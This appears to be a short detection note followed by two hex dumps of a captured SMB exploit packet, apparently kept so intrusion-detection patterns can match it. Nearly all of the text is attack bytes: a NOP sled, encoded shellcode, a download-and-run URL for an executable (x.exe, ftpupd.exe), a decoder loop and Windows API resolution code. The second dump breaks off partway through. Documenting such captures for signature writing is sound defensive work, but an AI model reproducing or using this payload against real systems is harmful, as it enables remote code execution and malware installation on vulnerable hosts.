The initially caught version of this shellcode is broken. Since it is still possible to detect it the shellcode has been documented. PCREs are designed to catch it wether it is broken or not.
hexdump
00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8 .....SMB ........ 00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04 ........ ........ 00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00 ........ ........ 00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02 ........ .T...T.. 00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00 ........ ..P.I.P. 00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00 E....... ........ 00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00 ........ ........ 00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90 ........ ........ 00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 58 68 74 ........ .....Xht 00000120: 74 90 90 90 90 90 90 90 - 90 90 90 70 3a 2f 2f 31 t....... ...p...1 00000130: 39 32 2e 31 36 38 2e 30 - 2e 31 3a 39 37 34 2f 78 92.168.0 .1.974.x 00000140: 2e 65 78 65 df df df df - df df df df df df df df .exe.... ........ 00000150: df df df 4d 6f 7a 69 6c - 6c 61 2f 34 2e 30 df 5d ...Mozil la.4.0.. 00000160: 33 c9 66 b9 f1 01 8d 75 - 05 8b fe 8a 06 3c 99 75 3.f....u .......u 00000170: 05 46 8a 06 2c 30 46 34 - 99 88 07 47 e2 ed eb 0a .F...0F4 ...G.... 00000180: e8 da ff ff ff 2e 62 65 - 67 2e 71 93 99 c9 99 c9 ......be g.q..... 00000190: 99 c9 12 fd bd 91 fd 16 - 99 c9 c1 72 68 aa 42 fd ........ ...rh.B. 000001a0: 66 aa fd 10 ba 14 1c a9 - 98 99 c9 99 c9 c9 f3 98 f....... ........ 000001b0: f1 98 99 c9 86 99 c9 71 - c5 98 99 c9 99 c9 90 5f .......q ........ 000001c0: cb 37 92 59 96 1c 78 99 - c9 99 c9 99 c9 14 e4 57 .7.Y..x. .......W 000001d0: 71 7d 99 c9 99 c9 99 c9 - 14 e4 3a 71 45 99 c9 99 q....... ...qE... 000001e0: c9 99 c9 f3 9d f1 99 c9 - 89 99 c9 99 c9 f1 99 c9 ........ ........ 000001f0: 99 c9 9c 99 c9 f3 99 c9 - 71 b4 98 99 c9 99 c9 67 ........ q......g 00000200: f3 e3 f0 10 1c d1 98 99 - c9 99 c9 b2 59 c9 c9 f3 ........ ....Y... 00000210: 9b c9 c9 f1 99 c9 99 c9 - 99 c9 d9 14 04 a2 98 99 ........ ........ 00000220: c9 99 c9 ca 71 93 98 99 - c9 99 c9 8d 68 61 91 10 ....q... ....ha.. 00000230: 1c ae 98 99 c9 99 c9 1a - 61 66 96 1d 11 99 c9 99 ........ af...... 00000240: c9 99 c9 b2 50 c8 c8 c8 - f3 98 14 dc 57 c9 71 26 ....P... ....W.q. 00000250: 99 c9 99 c9 99 c9 4e a4 - c0 91 12 49 92 59 ed f7 ......N. ...I.Y.. 00000260: b2 59 c9 c9 c9 c9 14 c4 - 3a ca cb 71 3c 99 c9 99 .Y...... ...q.... 00000270: c9 99 c9 ff 24 e4 21 92 - 59 ed cf cd cd f1 99 c9 ........ Y....... 00000280: 99 c9 9c 99 c9 66 2c d1 - 98 99 c9 99 c9 c9 71 13 .....f.. ......q. 00000290: 99 c9 99 c9 99 c9 fb b0 - b8 83 c3 cd 12 5d f3 99 ........ ........ 000002a0: c9 c9 cb 66 2c d1 98 99 - c9 99 c9 66 2c ae 98 99 ...f.... ...f.... 000002b0: c9 99 c9 71 0c 99 c9 99 - c9 99 c9 5a 48 a6 96 c0 ...q.... ...ZH... 000002c0: 66 2c ae 98 99 c9 99 c9 - 71 1c 99 c9 99 c9 99 c9 f....... q....... 000002d0: 4c 29 a7 eb f3 9c 14 04 - a2 98 99 c9 99 c9 ca 71 L....... .......q 000002e0: ea 99 c9 99 c9 99 c9 34 - f4 26 71 f3 99 c9 71 f1 .......4 ..q...q. 000002f0: 99 c9 99 c9 99 c9 f9 3b - 13 ef 29 46 6b 37 5f de ........ ...Fk7.. 00000300: 66 99 c9 5a ec a8 aa b7 - ab f0 99 c9 99 c9 99 c9 f..Z.... ........ 00000310: 99 c9 99 c9 b7 c5 ff ed - e9 ec e9 fd b7 fc e1 fc ........ ........ 00000320: 99 c9 99 c9 99 c9 99 c9 - 99 c9 99 c9 99 c9 99 c9 ........ ........ 00000330: 99 c9 99 c9 99 c9 99 c9 - 99 c9 ca f5 fc fc e9 99 ........ ........ 00000340: c9 f2 fc eb f7 fc f5 aa - ab 99 c9 c7 34 f9 aa 59 ........ ....4..Y 00000350: b4 25 2a 2a 66 c9 ac 93 - 90 81 b7 c9 9c 90 9d 63 ....f... .......c 00000360: 83 c9 cd 71 92 99 c9 99 - c9 99 c9 bf 19 35 51 14 ...q.... .....5Q. 00000370: fd bd 95 0a 72 91 c7 34 - f9 71 c8 99 c9 99 c9 99 ....r..4 .q...... 00000380: c9 12 d2 a5 12 d5 80 e1 - 9a 52 aa 6f 14 8d 2a 9a ........ .R.o.... 00000390: c8 b9 12 8b 9a 4a aa 59 - 58 59 9e ab 9b db 19 a3 .....J.Y XY...... 000003a0: 99 c9 ec 6c a2 dd bd 85 - ed 9e df a2 e8 81 eb 44 ...l.... .......D 000003b0: 55 12 c8 bd 9a 4a 96 2e - 8d eb 12 d8 85 9a 5a 12 U....J.. ......Z. 000003c0: 9d 09 9a 5a 10 dd bd 85 - f8 10 1c d5 98 99 c9 99 ...Z.... ........ 000003d0: c9 66 49 66 7f fd fe 12 - 87 a9 99 c9 12 c2 95 12 .fIf.... ........ 000003e0: c2 85 12 82 12 c2 91 5a - b7 fc f7 fd b7 90 90 90 .......Z ........ 000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90 ........ .F...... 00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90 ........ f....... 00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00 ........ ........ 00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00 .....p.. ........ 00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00 ........ .p...... 000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00 ........ .....p.. 000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........ 000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00 .p...... ........ 000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31 ....x... ....1111 000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111 00000cf0: 31 31 31 31 31 31 31 00 - 00 1111111. .
00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8 .....SMB ........ 00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04 ........ ........ 00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00 ........ ........ 00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02 ........ .T...T.. 00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00 ........ ..P.I.P. 00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00 E....... ........ 00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00 ........ ........ 00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90 ........ ........ 00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 58 68 74 ........ .....Xht 00000120: 74 90 90 90 90 90 90 90 - 90 90 90 70 3a 2f 2f 31 t....... ...p...1 00000130: 39 32 2e 31 36 38 2e 30 - 2e 31 3a 39 37 34 2f 78 92.168.0 .1.974.x 00000140: 2e 65 78 65 00 df df df - df df df df df df df df .exe.... ........ 00000150: df df df 4d 6f 7a 69 6c - 6c 61 2f 34 2e 30 00 5d ...Mozil la.4.0.. 00000160: 33 c9 66 b9 f1 01 8d 75 - 05 8b fe 8a 06 3c 99 75 3.f....u .......u 00000170: 05 46 8a 06 2c 30 46 34 - 99 88 07 47 e2 ed eb 0a .F...0F4 ...G.... 00000180: e8 da ff ff ff 2e 62 65 - 67 2e e8 0a 00 00 00 8b ......be g....... 00000190: 64 24 08 64 8f 00 58 eb - f1 33 db 64 ff 33 64 89 d..d..X. .3.d.3d. 000001a0: 23 8d 85 30 01 00 00 50 - 6a 01 68 01 00 1f 00 e8 ...0...P j.h..... 000001b0: 5c 01 00 00 09 c6 52 ae - 0b c0 0f 85 e1 00 00 00 ......R. ........ 000001c0: 8d 7d ce e8 e4 00 00 00 - 8d 7d a3 e8 dc 00 00 00 ........ ........ 000001d0: 6a 04 68 00 10 00 00 68 - 00 00 05 00 6a 00 e8 2d j.h....h ....j... 000001e0: 01 00 00 fe 6a 7a 69 89 - 85 48 01 00 00 2b c0 50 ....jzi. .H.....P 000001f0: 50 6a 02 50 50 68 00 00 - 00 40 8d 9d 3b 01 00 00 Pj.PPh.. ........ 00000200: 53 e8 0a 01 00 00 14 f1 - f8 08 89 85 37 01 00 00 S....... ....7... 00000210: 83 f8 ff 0f 84 88 00 00 - 00 2b c9 51 51 51 6a 01 ........ ...QQQj. 00000220: 8d 45 ce 50 e8 bf 00 00 - 00 d7 3d 59 08 8b d0 0b .E.P.... ...Y.... 00000230: c0 74 6e 2b c0 50 50 50 - 50 8d 5d a3 53 52 e8 a5 .tn..PPP P...SR.. 00000240: 00 00 00 66 bd 7d b8 0b - c0 74 56 54 54 68 00 00 ...f.... .tVTTh.. 00000250: 05 00 ff b5 48 01 00 00 - 50 e8 8a 00 00 00 62 29 ....H... P.....b. 00000260: 21 1a 5a 54 8b c4 6a 00 - 50 52 ff b5 48 01 00 00 ..ZT..j. PR..H... 00000270: ff b5 37 01 00 00 e8 95 - 00 00 00 c3 d1 3f 0f 59 ..7..... .......Y 00000280: ff b5 37 01 00 00 e8 85 - 00 00 00 d5 b0 3e 72 6a ..7..... ......rj 00000290: 05 8d 9d 3b 01 00 00 53 - e8 73 00 00 00 ad 6d bf .......S .s....m. 000002a0: e8 6a 00 e8 68 00 00 00 - 60 a2 8a 76 b0 df f2 ae .j..h... ...v.... 000002b0: c6 47 ff 00 c3 75 31 33 - 2e 32 69 00 00 00 00 00 .G...u13 .2i..... 000002c0: 2e 5c 66 74 70 75 70 64 - 2e 65 78 65 00 00 00 00 ..ftpupd .exe.... 000002d0: 00 00 00 00 00 00 00 00 - 00 53 6c 65 65 70 00 6b ........ .Sleep.k 000002e0: 65 72 6e 65 6c 33 32 00 - 5e ad 60 33 c0 2d bc b3 ernel32. ...3.... 000002f0: b3 ff 50 35 0a 09 18 2e - 50 05 09 04 fa 1a 50 54 ..P5.... P.....PT 00000300: e8 0b 00 00 00 26 80 ac - c8 8d 64 24 0c 93 eb 08 ........ ..d..... 00000310: 5e ad 60 e8 51 00 00 00 - 8b 4b 3c 8b 4c 19 78 03 ....Q... .K..L.x. 00000320: cb 33 f6 8d 14 b3 03 51 - 20 8b 12 03 d3 33 c0 c1 .3.....Q .....3.. 00000330: c0 07 32 02 42 80 3a 00 - 75 f5 3b 44 24 1c 74 07 ..2.B... u..D..t. 00000340: 46 3b 71 18 72 dd cc 8b - 51 24 03 d3 0f b7 14 72 F.q.r... Q......r 00000350: 8b 41 1c 03 c3 8b 04 90 - 03 c3 89 44 24 1c 61 89 .A...... ...D..a. 00000360: 85 4c 01 00 00 ff d0 ff - e6 64 67 8b 1e 30 00 8b .L...... .dg..0.. 00000370: 5b 0c 8b 5b 1c 8b 1b 8b - 5b 08 c3 99 c9 99 c9 99 ........ ........ 00000380: c9 12 d2 a5 12 d5 80 e1 - 9a 52 aa 6f 14 8d 2a 9a ........ .R.o.... 00000390: c8 b9 12 8b 9a 4a aa 59 - 58 59 9e ab 9b db 19 a3 .....J.Y XY...... 000003a0: 99 c9 ec 6c a2 dd bd 85 - ed 9e df a2 e8 81 eb 44 ...l.... .......D 000003b0: 55 12 c8 bd 9a 4a 96 2e - 8d eb 12 d8 85 9a 5a 12 U....J.. ......Z. 000003c0: 9d 09 9a 5a 10 dd bd 85 - f8 10 1c d5 98 99 c9 99 ...Z.... ........ 000003d0: c9 66 49 66 7f fd fe 12 - 87 a9 99 c9 12 c2 95 12 .fIf.... ........ 000003e0: c2 85 12 82 12 c2 91 5a - b7 fc f7 fd b7 90 90 90 .......Z ........ 000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000005e0: 90 90 90 90 90 90 90 